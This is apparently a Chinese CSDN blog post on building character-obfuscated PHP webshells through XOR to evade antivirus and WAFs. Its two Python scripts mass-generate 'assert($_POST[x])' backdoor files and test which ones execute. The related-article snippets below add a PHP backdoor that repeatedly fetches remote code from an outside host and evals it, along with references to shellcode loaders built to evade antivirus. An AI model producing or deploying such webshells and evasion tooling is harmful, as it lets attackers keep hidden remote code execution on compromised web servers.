python通过异或运算构造无字符后门实现免杀

最新推荐文章于 2024-03-28 20:19:44 发布
最新推荐文章于 2024-03-28 20:19:44 发布
阅读量488 收藏
点赞数
文章标签: python 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/klcyl_0106/article/details/125855130
版权

1.免杀异或shell原理

php异或:
^为异或的符号
( “!” ^ “@” )= ’a’ //两个变量的值进行异或时,会先将两个变量的值转换为ASCII,再将ASCII转换为二进制,对两对二进制数据进行异或,异或完,再将结果转为ASCII,最后将ASCII转为字符串,即为最终结果。注:34+63!=97,一定要用二进制

2.生成Payload代码并有序命名写入文件

import requests 
for i in range(1,127):
        for ii in range(1,127):
            payload="'"+chr(i)+"'"+'^'+"'"+chr(ii)+"'"
            code="<?php $a=("+payload+").'ssert';$a($_POST[x]);?>" #<?php assert($_POST[x]);?>
            #print(code)
            #将code写入文件
            filename=str(i)+'xd'+str(ii)+'.php'
            with open('D:/phpstudy/PHPTutorial/WWW/x/' + filename, 'a+') as f:
                f.write(code)
                print('Fuzz->' + filename + '文件写入成功')
                f.close()
#单线程访问shell文件并提交测试
            url = 'http://127.0.0.1:8081/x/' +filename
            data = {
                'x': 'phpinfo();'
            }
            result = requests.post(url, data=data).content.decode('utf-8')
            if 'XIAODI-PC' in result:
                print('bypass->'+filename+'->ok')
		print(code)
            else:
                print('bypass->'+filename+'->no')

3.多线程实现批量访问shell文件并提交测试是否正常连接回显

import time
import requests
import threading,queue
def bypass_check():
    while not q.empty():
        filename = q.get()
        url = "http://127.0.0.1:8081/x/" + filename
        datas = {
            'x ': 'phpinfo();'
        }
        result = requests.post(url, data=datas).content.decode('utf-8')
        if "XIAODI-PC" in result:
            print('check ->' + filename+'->ok')
        else:
            print('check ->' + filename + '->no')
        time.sleep(1)
if __name__ == '__main__':
    q = queue.Queue()
    for i in range(1,127):
        for ii in range(1, 127):
            payload = "'" + chr(i) + "'" + "^" + "'" + chr(ii) + "'"
            code = "<?php $a=(" + payload + ").'ssert';$a($_POST[x]);?>"
            filename = str(i) + 'xd' + str(ii) + '.php'
            q.put(filename)
            with open(' D:/phpstudy/PHPTutorial/WWW/x/' + filename, 'a+') as f:
                f.write(code)
                print("Fuzz文件生成成功")
    for x in range(20):
        t = threading.Thread(target=bypass_check)
        t.start()
kcllg
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
python 异或加密字符串的实例
09-20
Python中的异或加密是一种简单的加密方法,它基于二进制位的异或操作。异或操作的特性是:任何数与0异或都等于本身,相同位数的数异或结果为0,不同位数的数异或结果为1。在加密过程中,字符串的每个字符(通常以...
构造不包含字母和数字的webshell
weixin_54347738的博客
08-20 357
assert(eval())是可以的,assert中执行了eval函数。这里面1提交过去的是字符串,assert函数无法执行字符串。异或的二进制的值是00100001,对应的ASCII值是33,对应的字符串的值就是!第二行中,ascii码,>的大于
shell 运行 python脚本并返回
zyx_bx的博客
11-30 1089
*注意:**python中只能有一个print,多个回造成返回的值混乱或无效值。shell接收python 用 print。
p78 Python 开发-多线程 Fuzz&Waf 异或免杀&爆破
weixin_43263566的博客
03-09 643
Python 开发-多线程 Fuzz&Waf 异或免杀&爆 破
Python免杀入门学习
Fighter安全
04-23 2015
这里主要针对国内主流三大杀软进行免杀测试,python语法简单,开发效率高,适合入门学习,而且免杀效果也还不错。当然免杀是具有时效性的,文章的方法主要记录一下免杀思路。python环境:python2.7.18(x64)、python3.11.1(x64)windows环境:windows10、windows11杀毒软件:360杀毒(全引擎) + 火绒 + Windows Defender。
php后门--异或
weixin_34253126的博客
05-09 211
看这个:<?php echo "A"^"}";?> 运行这段代码,那么输出的结果是字符"<",之所以会得到这样的结果,是因为代码中对字符"A"和字符"}"进行了异或操作。在PHP中,两个变量进行异或时,会将字符串转换成二进制再进行异或,异或完,又将结果从二进制转换成了字符串。异或操作有时也被用来交换两个变量的值。 我们都知道,PHP...
Java编程实现对十六进制字符异或运算代码示例
08-28
在这个示例中,使用 Java 语言实现了对十六进制字符串的异或运算,通过将十六进制字符串转换为二进制形式,然后进行异或运算,最后将结果转换回十六进制字符串。这个示例展示了异或运算在实际应用中的重要性和实用性...
十六进制字符串按位异或运算工具和java位异或运算
10-27
本节将详细介绍十六进制字符串的按位异或运算以及如何在Java中实现这一运算。 十六进制字符串是由0到9和A到F(或a到f)组成的字符序列,每个字符代表4位二进制数。例如,十六进制数"AB"在二进制下表示为10101011。...
Java使用异或运算实现简单的加密解密算法实例代码
08-28
Java 使用异或运算实现简单的加密解密算法实例代码 在信息安全领域中,数据加密和解密是非常重要的环节。Java 作为一门流行的编程语言,也提供了多种方式来实现加密和解密。在本篇文章中,我们将介绍使用异或运算...
PHP 无文件后门
oceanark的博客
07-13 653
webshell.php <?php unlink($_SERVER['SCRIPT_FILENAME']); ignore_user_abort(true); set_time_limit(0); $remote_file = 'http://xsser.me/webshel.txt'; while($code = file_get_contents($remote_file)){ @e
编写变态的(非字母数字的)PHP后门
代码析构师的专栏
05-09 687
在这篇文章中,我将向大家介绍如何编写一个非字母数字的PHP后门。在编写这种PHP后门的时候,我们首先需要了解一些基础知识:     (1)了解PHP     (2)了解curl或者其他一些能够操作HTTP请求的工具   还有一点需要大家了解的是PHP中异或(^)的概念。对于异或,大家肯定都有所了解,但是平常能用到的地方可能不多,最起码本人不经常使用(勿喷)。之所以在这里强调一下异或的概
记一次拿webshell踩过的坑(如何用PHP编写一个不包含数字和字母的后门)
weixin_33943347的博客
08-06 766
0x01 前言 最近在做代码审计的工作中遇到了一个难题,题目描述如下: &lt;?php include 'flag.php'; if(isset($_GET['code'])){ $code = $_GET['code']; if(strlen($code)&gt;40){ die("Long."); } if(preg_ma...
捡了一个非常淫荡的PHP后门,给跪了
weixin_30606461的博客
01-23 2869
<?php unlink($_SERVER['SCRIPT_FILENAME']); ignore_user_abort(true); set_time_limit(0); $remote_file = 'http://xxx/xxx.txt'; while($code = file_get_contents($remote_file)){ @eval($code); sleep...
免杀对抗】远程加载AES+XOR异或加密的ShellCode加载器 过国内杀软
最新发布
qq_35942869的博客
03-28 1828
纯萌新,尝试一下免杀,最近也是查了很多资料,面向Github编程借鉴了很多大佬的代码。通过XOR异或加密后再进行AES加密,然后通过修改shellcode加载方式进行简单的免杀
免杀】异或加密Shellcode免杀绕过火绒、360
z2560088的博客
03-19 2293
msfvenom生成c格式的shellcode 对该shellcode进行异或加密 #include<string> #include <iostream> using namespace std; using std::string; unsigned char buf[] = "\xfc\xe8\x8f\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30" "\x8b\x52\x0c\x8b\x52\x14\x0f\xb7.
78 Python开发-多线程Fuzz&Waf异或免杀&爆破
山兔的博客
01-03 1066
通过ftp模块的学习,大家可以去写个其它协议的,比如mysql或者sqlserver的,模块打上去就完事了,就可以用这个模块进行连接操作。ftp软件这边是可以看到日志的,到时候我们爆破的时候可以看一下有没有登录日志,看一下是不是正常的。python里面基本上都有相对应的支持协议模块的库,我们就可以使用相关的库进行相关协议的连接。协议模块使用,Request爬虫技术,简易多线程技术,编码技术,Bypass后门技术。掌握利用强大的模块实现各种协议连接操作(爆破或利用等),配合Fuzz吊打WAF等。
python后台执行shell
Mr_老冷的博客
03-08 2742
osx: 10.15 python: 3.6.5 airetest ios需要执行两部shell命令,且需要一直执行,借用python来后台执行 #coding:utf-8 import subprocess, time class Shell(object): def __init__(self, cmd): self.cmd = cmd se...
实现免杀:Shellcode的AES和XOR加密策略(vt查杀率:4/70)
xf555er的博客
05-24 2075
XOR加密又称为异或加密,异或加密属于对称加密。在异或加密中,使用一个密钥(通常称为密钥流)与明文数据进行异或操作,生成加密后的密文。解密过程与加密过程相同,将密文与相同的密钥流进行异或操作,即可恢复原始明文数据AES加密,即高级加密标准(Advanced Encryption Standard)加密,是一种对称密钥加密算法,广泛应用于现代密码学中对称密钥:加密和解密过程使用相同的密钥。因此,密钥的安全性至关重要。
linux下python版webshell后门查杀工具
weixin_33798152的博客
03-16 513
使用说明: 1.查杀指定路径:python webshell.py 路径 2.按时间查找文件:python webshell.py 路径 “2013-09-28 00:00:00″ # -*- coding: utf-8 -*- import osimport sysimport reimport time rulelist = [ '(\$_(GET|POST|REQUEST...
python逆向异或运算脚本
05-12
以下是一个简单的 Python 脚本,可以进行逆向异或运算: ```python import sys if len(sys.argv) != 3: print("Usage: python xor_decrypt.py <input_file> <key>") sys.exit() input_file = sys.argv[1] key = int(sys.argv[2], 16) with open(input_file, "rb") as f: data = f.read() output = "" for byte in data: output += chr(byte ^ key) print(output) ``` 在命令行中运行该脚本时,需要传入两个参数:要解密的文件和异或密钥(以十六进制格式表示)。例如,如果要解密名为 `encrypted.bin` 的文件,密钥为 `0x42`,则可以运行以下命令: ``` python xor_decrypt.py encrypted.bin 0x42 ``` 脚本将读取文件的内容,对每个字节执行异或运算,并将结果输出到控制台。请注意,该脚本仅适用于单字节 XOR 加密,对于更复杂的加密算法可能需要使用其他工具。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值